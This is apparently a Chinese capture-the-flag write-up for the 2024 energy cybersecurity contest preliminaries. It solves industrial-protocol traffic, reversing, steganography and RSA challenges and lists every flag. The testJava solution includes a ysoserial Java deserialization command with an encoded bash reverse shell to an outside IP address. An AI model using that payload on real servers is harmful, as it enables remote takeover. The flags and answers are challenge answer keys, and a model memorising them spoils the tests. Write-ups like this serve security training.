gooooose-A
分数: 50
工控设备在通信时,会传输异常的一些数据,请根据流量包进行分析。
观察流量发现 goose 协议的 all_data 数据段,当items为4是,第4个item是一个小于128的数,全部提取出来
tshark.exe -r data.pcapng -e "goose.integer" -T fields
把所有小于128的数字转ascii,
data='''1804289383,846930886
1714636915,1957747793
719885386,1649760492
1189641421,1025202362
783368690,1102520059
1967513926,1365180540
304089172,1303455736
521595368,294702567
336465782,861021530
233665123,2145174067
1101513929,1801979802
635723058,1369133069
1059961393,2089018456
1656478042,1131176229
859484421,1914544919
756898537,1734575198,84
149798315,2038664370
184803526,412776091
1911759956,749241873
42999170,982906996
511702305,2084420925
1827336327,572660336
805750846,1632621729
1433925857,1141616124
939819582,2001100545
1548233367,610515434
1374344043,760313750
356426808,945117276
1780695788,709393584,86
1918502651,752392754,112
2053999932,1264095060
1843993368,943947739,88
855636226,1749698586
1956297539,1036140795
2040651434,1975960378
1892066601,1376710097
1330573317,603570492
660260756,959997301,82
402724286,593209441,48
894429689,364228444
221558440,270744729
1633108117,2114738097
1469834481,822890675
791698927,631704567
1255179497,524872353
1572276965,269455306
352406219,1600028624
2040332871,112805732
378409503,515530019
1573363368,1409959708
1373226340,1631518149
289700723,1117142618
150122846,439493451
1760243555,1231192379,78
111537764,338888228
438792350,1911165193
2142757034,116087764
155324914,8936987
1275373743,387346491
841148365,1960709859
771151432,1186452551
971899228,1476153275,97
1139901474,1626276121
2130794395,1239036029
1605908235,1350573793
1605894428,1789366143
1875335928,1784639529
1597322404,1939964443
1432114613,1067854538
1782436840,1909002904
1395235128,532670688
492067917,1504569917
706043324,496987743
1359512183,480298490
1096689772,2086206725
1172755590,1544617505,77
1012502954,1272469786
968338082,722308542
933110197,6939507,122
1285228804,1789376348,78
1450573622,1037127828
654887343,1529195746
1335354340,87755422
1494613810,1447267605,78
745425661,396473730
1346811305,1569229320
1590079444,434248626
1470503465,1402586708
1143408282,188213258
1884167637,1473442062,84
238962600,776532036
1273911899,1431419379
1665947468,619290071
407487131,2113903881,108
1776808933,711845894
937370163,2058657199
1642548899,1501252996
1472713773,824272813
2025187190,1967681095
437116466,1704365084
638422090,1943327684
1876855542,1069755936
349517445,588219756,74
1057418418,995706887
1065103348,625032172,72
1469262009,1562402336,83
1295166342,1057467587,48
1555319301,382697713
1070575321,260401255
774044599,697517721,53
1950955939,1335939811
1756915667,1065311705
846811127,1414829150
555996658,324763920
231602422,1389867269
619054081,711645630
917679292,2006811972
570073850,1414647625
1046741222,337739299
1343606042,1111783898
1197352298,915256190
846942590,524688209
1566288819,1371499336
726371155,1927495994,75
882160379,11614769
1662981776,630668850
1858721860,1548348142
964445884,2118421993
452867621,1017679567
201690613,213801961
648031326,1411154259
282828202,110613202,86
982936784,1676902021
950390868,255789528
1242608872,1137949908,69
777210498,653448036,99
1023457753,364686248
1129033333,1329132133
501772890,1781999754
212251746,1983690368,48
1034514500,484238046
624549797,767066249
739273303,1750003033
78012497,552910253,78
1344247686,1795519125
474613996,425245975
235649157,1448703729
1545032460,430253414,69
677870460,932026304,82
828388027,1144278050,78
1192707556,31308902
820697697,655858699
559301039,1395132002
1974806403,1473144500
1498617647,669908538
12895151,1144522535
1328104339,1380171692,84
860516127,777720504
1722060049,1455590964
70636429,136495343
402903177,1329202900
1219407971,2416949
655495367,561717988
1841585795,389040743
1433102829,1887658390
672655340,1900553541
337453826,1081174232
1450956042,1941690360
847228023,1516266761
1175526309,1586903190,85
500618996,1989806367,112
2004504234,1061730690
2016764524,1717226057
1276673168,1411328205
2009726312,696947386
1265204346,1369602726
1665204916,1707056552
1297893529,1010528946
1708302647,1857756970
1426819080,885799631
1281830857,1386418627
318561886,1243439214,87
1505193512,1112720090
1106059479,241909610
1095966189,104152274,84
826047641,1369356620
309198987,887077888
873524566,37487770
1232056856,1745790417
959372260,1025125849
126107205,159473059
1282648518,478034945
1353436873,1983228458
993967637,941804289
2045826607,2037770478
1647149314,716334471
470591100,1025533459,85
1001089438,1899058025,49
394633074,983631233
1645933681,1943003493
1635550270,2069110699
864101839,1204275569
1336092622,410228794
773319847,1404196431,90
452456682,1302539390
235745791,802205057
1388391521,1272796157
1280631491,126401947
1210359231,521035021,82
738393740,19485054
1291554098,1655035325
2004187516,371653516
1047372231,1707746139
2073785404,333582338
1894519218,786039021
1605539862,1021784812
2032894977,262692685
1338299904,1543324176
395279207,606199759,69
435889744,1344593499
272020127,488663950
29777560,345367818,100
991810563,1392740049
216588711,1319041805
845563291,1066077375
629593614,524133589
1215828993,409544918
927376882,1747844822,79
765326717,2143124030
1124311574,431530126,87
1502781486,703550253
1388803074,733327814
1646478179,1725138377
1464415775,1941727088
1615935710,639806732
406011017,1269400346,108
217871137,337745691,82
292423943,1265122573
1910300925,2030449291
1986894018,1007277217
1260596963,362575055
1022963858,1751378130
1130698571,1250372661
483689685,567304789
1155722604,35756851
746349250,441767868
861109485,659639006
1385414639,952062949
1510080967,714880226
1630387677,554290596
34740865,1814887560
1290127955,690367770,72
1131359211,1821066342
550245196,157272379,83
1910858270,1312994984
1763794427,2059344234
738647283,772970072
51245830,10901063
628966950,1520982030
1089653714,1003886059
410134047,1038626924
93189435,181271232
1527622954,1312630443
2064945486,1862875640
1022089159,1626250262
14989683,1242561041
1597141723,1981208324
1691449122,2032454154
590335821,513937457
204102747,1603591171
372160269,2013725218
207621703,2106914653
733450907,1487053959
932862806,1404515797
1289547084,279121308,106
811742698,294110991
245798898,1891252715
452825171,1435218189
670752506,2025554010
262178224,82173109
857490000,454333378
343945053,661955081
11671338,1395405989
992028067,180785147
1687776787,1470332231
1862292122,134591281
1131884850,380390179
235202254,833215350
1370973813,1503967857
873199181,1766146081
1979015720,476152433
803590181,820097487
1735079296,831768825
2006138722,1823796892
1534230297,1364090032
1341443181,1078898506
1442767057,63299708
1287859999,298501962
420687483,1669475776
1579068977,395191309
672139932,226723382
219544266,1030313563,90
428903682,617909211
2033669086,476564285
1671735990,2010794583
632651476,1204754116
1875641892,500037525
1351538839,1787897525
1660651136,61101360,82
1326247643,1640170337
610506582,164826621
370917955,384370888
951426815,813274570
216220853,699460008
1304811783,223712350
1610009097,856363827,80
846621269,584522071
146533149,1936060910,84
1892430639,1449228398
1012836610,627992393
528433890,1238498976
270754552,1609416931
1043388777,413360099
286448566,629580952,48
6072641,1934392735
1736491298,1396918184,57
376696776,96055805
1664423428,242588954
445080308,2135019593
1434322197,1000372555
1916250774,1528806445
415522325,1799560997
1446648412,695466127
1143565421,981914693
1539942439,987987334
12548159,576994985
1489001354,953691761
1402492972,470631541
1104561852,915711850
108375482,202550399
1887665154,2118801173,80
610486506,386839851
942724790,1833488263
1688323172,829570037
916018859,222028828
2078107280,234576987
342146590,1723578341
849725352,978587665
1599893069,2083149517
190113083,44041351
1928189300,1931706506
900104667,394709364
1671581032,1337434154
991039875,878273679
1292413412,1794292538,81
434290636,1724916170
153162844,2067062760
825726814,769304465
1968922326,221713886
1880346039,411826969
1994320152,192532621
2079611790,1092637289
404259631,616734673
562395735,1607774548
1550101877,752704313,61
612353198,1186994949
2056665155,1340157793
929588156,18400960
781098823,1987323286
568275358,1720185677
399493245,1567022181
14933990,1499150323
25084100,1903409954,61
1372668364,318322042
1451042659,1868423919
1176225844,333293469
478841551,242474976'''.split("n")
flag=""
for each in data:
if each != "":
tmp = each.split(",")
else:
continue
s = tmp[-1]
if int(s)<128:
print(s)
flag += chr(int(s))
print(flag)
TVpXR0NaMzNNTlJHS05KVEc0NERNTUpWTU1ZREdOWlRHSjZRPT09PQ==
然后base64再base32得到
IP找不到了-A
分数: 50
某油库系统工程师,在对一台带有双网卡的DCS设备进行维修,但是他不知道新网络模块的IP地址,请分析流量,帮助找到地址,之前通过web访问过DCS控制器的一些状态信息。提交格式:flag{xx.xx.xx.xx}。
在http的4343这一帧,保存html文件
flag{172.16.129.0}
Modbus-A
分数: 50
奇怪的流量
追踪流得到
flag{ee92722f-973c-46c9-a05e-d5e9f3540529}
结构化数据分类分级识别-A
分数: 50
题面:请参数选手从给定的名为“transfer_info.pcap”的PCAP包中,解出通过http协议传输的命名”test.xlsx”的excel文件。excel文件中第一个sheet页中有若干列数据,其中包含身份证号码、驾照编号、银行卡号、MAC地址、邮箱等五种敏感信息。请参赛选手识别出包含上述五种敏感信息且对应正确敏感信息占比大于50%的列,然后根据《数据分类分级规则.xlsx》中对数据分类分级的定义,确定每种敏感信息的数据分类、数据级别,并作为所在列的数据分类和数据级别。然后把识别结果按照《题目描述.pdf》中要求的顺序和格式构造答案并计算答案的MD5值,将答案的MD5值提交至平台。答案中的分隔符“-”、“_”、“;”均为英文字符,答案以英文分号“;”结尾,MD5值英文字符全小写,长度32个字
首先在流量包中找到 test.xlsx,然后根据题目描述里面,对数据进行筛查
所以答案就是:c1_1-1-5-1_3;c2_1-1-5-1_3;c3_1-1-2-1_3;c5_1-1-2-2_3;c7_1-1-3-1_2;
Md5后是
flag{bd8c4ee3e25545b16eb3622378b2a95a}
ezsys-A
分数: 50
你在一次测试中进入了核电站的控制终端,你发现这里有一个秘密需要通过逆向来进行获取。
逆向分析 过掉花指令可以看到真实种子是0x91d代码摘出来即可获得flag
easy_re-A
分数: 280
逆向分析程序中算法。提交格式:flag{xxx}。
魔改的upx壳 无需脱壳 ida打开 动态调试找到逻辑点 代码数据摘出来写脚本即可
Fins协议分析-A
分数: 50
如果请求数据为:46494e530000001b000000020000000080000200640000fc0040010231000000000101,请分析构造其响应数据,flag即为响应数据(附件仅做参考)。提交格式:flag{xxx}。
去年一个工控决赛的原题魔改,根据当时的wp
这一次的数据是
46494e530000001b000000020000000080000200640000fc0040010231000000000101
所以flag就是
flag{46494e53000000160000000200000000c0000200fc000064004001020000}
testJava-A
分数: 388
某燃油公司的Web测试服务器因为向互联网开放访问,服务器上部署的测试程序被攻击,导致服务器被恶意控制。
代审存在反序列化
打4.4进行利用
java -jar ysoserial-all.jar CommonsCollections2 “bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjAuNDYuNzAuMjIzLzc3NzcgMD4mMQo=}|{base64,-d}|{bash,-i}”|base64
构造token
打
seeyouagain-A
分数: 50
找到flag,flag格式为flag{xxx}
图片底下有带密码的压缩包,图片改高度得到压缩包密码
压缩包里面的文件是一个base64 隐写
from Crypto.Util.number import *
from base64 import *
table = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
with open("data.txt") as f:
data = f.read().split("n")
flag = ""
for each in data:
if each!="":
cipher=each
else:
continue
#print(cipher)
num = cipher.count("=")
if num==0:
continue
cipher = cipher[:-num]
sbin = ""
for i in cipher:
sbin+=bin(table.index(i))[2:].rjust(8,'0')
hidebit = sbin[-num*2:]
flag+=hidebit
print(flag)
# 0110011001101100011000010110011101111011011001000110000100110110011000010110001100110001001100000011000101100010001100000011010101100010001101100011100100110111001101000111110100001000000000
找到钥匙-A
图片底下有一个flag_enc
图片里面有数据是e和n,所以是一个rsa,n不大,所以直接yafu分解得到p,q,解密rsa得到flag
with open("flag.enc","rb") as f:
data = f.read()
from Crypto.Util.number import *
c = bytes_to_long(data)
n = 0x80C23546F66C490FAB718322666B3AD9C5D31C4D4BDA4C1D783FC73FB4115253
e = 65537
p = 172885878211796787522220685199694830877
q = 336864880216429367305541498622715085359
d = inverse(e,(p-1)*(q-1))
print(long_to_bytes(pow(c,d,n)))
b’x022x8dIaxf04Dxd8x00flag{ed22321e9ae1ca8}’
原文始发于微信公众号(Van1sh):2024 能源网络安全大赛预赛 【金盾检测】
